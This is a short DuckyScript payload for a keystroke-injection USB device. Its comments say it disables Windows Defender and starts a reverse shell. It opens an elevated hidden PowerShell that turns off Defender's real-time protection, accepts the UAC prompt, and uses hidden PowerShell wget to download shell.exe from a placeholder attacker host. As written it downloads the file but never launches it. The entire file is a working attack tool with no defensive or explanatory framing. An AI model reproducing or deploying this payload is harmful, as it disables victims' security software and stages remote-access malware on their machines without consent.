REM Turn off Windows Defender and start reverse shell
REM
DELAY 1000
GUI r
DELAY 200
REM Start an elevated powershell instance which will disable Windows Defender.
STRING powershell -w hidden start powershell -A 'Set-MpPreference -DisableRea $true' -V runAs
ENTER
DELAY 1000
REM if you need administrator [left, enter and delay 1000]
LEFT
ENTER
DELAY 1000
ALT y
DELAY 1000
GUI r
DELAY 100
STRING powershell -w hidden wget http://ip_address/shell.exe
DELAY 300
ENTER
DELAY 3000
STRING exit
DELAY 100
ENTER
